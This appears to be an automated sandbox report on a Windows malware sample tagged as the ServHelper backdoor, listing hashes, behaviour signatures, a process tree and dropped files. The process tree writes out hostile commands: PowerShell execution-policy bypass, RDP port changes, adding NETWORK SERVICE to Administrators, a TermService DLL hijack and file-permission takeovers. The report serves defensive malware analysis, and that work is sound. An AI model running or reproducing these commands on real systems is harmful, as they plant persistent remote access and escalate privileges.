Analysis
-
max time kernel
141s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
-
submitted
22-12-2023 00:32
General
-
Target
37ee84f9933d943000195e804b3b7b75.exe
-
Size
4.1MB
-
MD5
37ee84f9933d943000195e804b3b7b75
-
SHA1
738f4e23ce5dd5c2c08de9cdb9ca99c0e4db90f5
-
SHA256
c6d19a50de0ff5674c48106227234f3e9d5231e97a79cf51dd137042b7444ba5
-
SHA512
fdb6f22c1adf37a6e6d11419c964859602f1db8ce3dcb2ec887570e168d47975a74b5a16e8af5da11d4de54e071e308a950ef3908def2f0612de3ac0b6fd73f2
-
SSDEEP
98304:l8Cirq4EmiHjDhIKuPU5Du+f+8Q4LuIa:lUrqzjDhOkGCTa
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
Drops file in System32 directory 2 IoCs
-
Drops file in Windows directory 8 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\37ee84f9933d943000195e804b3b7b75.exe"C:\Users\Admin\AppData\Local\Temp\37ee84f9933d943000195e804b3b7b75.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qm-mqes4.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1FC0.tmp"1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr1⤵
-
C:\Windows\SysWOW64\net.exenet start rdpdr2⤵
-
-
C:\Windows\SysWOW64\net.exenet start TermService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService1⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD589533866d64c8ebf7b2f6aa61e8474c0
SHA1f78bca7119944ee0e464456b063edca2940bde5a
SHA2566b48b31c6cbe53a939a741a00bf3cd16a157910b3ec01516dcae0a86cc670b5c
SHA512b43e65175a165d70565f9a0eebde7dbf5d86a021939d07bb4ed58e890bffef6304045c5832e78559695a9beaca4b14fe404d2dcceacf4b358b31ca1f2e4df7ec
-
Filesize
215KB
MD595d5c45799b5c14400435b459c632bcb
SHA1a5ddaedf05b67ca1d0dc801123e513f0bf2c0b74
SHA256a380c819c9b8b9849c582dfb0e794e47adb6a3dcd5dcf4212d81d042ac8819af
SHA512da7c3abfbd87d179c7329a1145f8df9083a137285a679fba2612b58a4f8df4298a29345dbc1b5d854b701ea57ca16cd4db91a1056e6770b1bea7c64a85f5c203
-
Filesize
3KB
MD57d73e5f02333bd81e758c59a954836ec
SHA188a1994e97a888e625bbc4a998c249a17146a5ee
SHA2563a51170d088d7b90c3e23a5a38992ace5103d204310d644b364143d8c5c41883
SHA5122c005092083ece3c08bb84a4e3d35f53da884e9675b8c41f6772542f13b53c03472f7fd314285d18e7f10ff65604faaf71f93fcf14abf4b33f0381d0a4f65bb5
-
Filesize
7KB
MD532d904436569ab74069eb1ee7fe3f3c3
SHA1edd1a4f165e6345340288a1c45dcc72b591e32df
SHA2562aa940cf83a8580bc1bb4e8433137df3cdf4529d14cefd89cf94e7ce883c4cd8
SHA5123861adf8f4b3eed2b7492569390867ced362b93ccc887f441d0245692abb3bced929068be58998e3e8e0b3ca3b8c8e0afbfd90bf230133e6d3d8479aa7a8f98e
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
7KB
MD5fcf14f921e5a46a0ba39ad7e6b3b8df2
SHA1927c54ba7e2a397fbc829bdd23dfad11387a791c
SHA2562ac57cb48776b82c0e962589c9f11129e0743216f4c1c9fb97be1f4f4017dff7
SHA51208dbdf613cd10d7b73dcad2ee57662648fffffb65d2090915a0aa1bb89d583f43e704b600a62b517d24fd0c82f1b00db450996236ed9b3904abb693f7bee39e2
-
Filesize
1KB
MD559c962e1fd289325f5c1641aa4135cda
SHA1ad6aaad4ad3dec1281a6e2106ce059051d3c30ca
SHA256f776e59dc8b1dd623332315dd0839a176156657003076b0541c1db2f5eca3c38
SHA512a048431914b829db703af5a46161379daf9deed3c7435bd01be56a995d2d52a38dfc48dc0a01ce65986f9e24b63436cabc582767ae78910283ba0cbb12b9cafb
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5288f2fcd478646cd7ce36b1d36bf321a
SHA11842d95e14e0722a29f10f49fdf310e82c6ab0a1
SHA256e41d28e38c6fd8832cc48c0540a9cc6adb907b38da2a6bbd3314f781f1601b8f
SHA51200bf49c77fe812317af6dcef807bc8ef9a519ab6eb2cb5524b51141df22a605f2b5a6517327af29bfb18aa584a57fe96dcebd5d78b64bfdc64964cce349fd37e
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
309B
MD5cff9e4f3bf2b098ee680acd14fab3580
SHA17b7dc230b0d3ab2530c2bc89f1e3ecd0a5d247ad
SHA256a4d1a6a63c18e5f5fa4dda8cd2dc7fb6626ec60f11aa4c2515ddd5d581567df2
SHA512103178b02c57236849912c21df94ace844c93b316bbe5d2c85871bdc404a9081026543f71bf4ba937d0b237559a59c44c7f2c63554f5e7e36e349c056a935402
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
6.9MB
-
Filesize
4.0MB
-
Filesize
256KB
-
Filesize
4.0MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
33.2MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
256KB
-
Filesize
4.0MB
-
Filesize
6.9MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
5.7MB
-
Filesize
256KB
-
Filesize
256KB
-
Filesize
256KB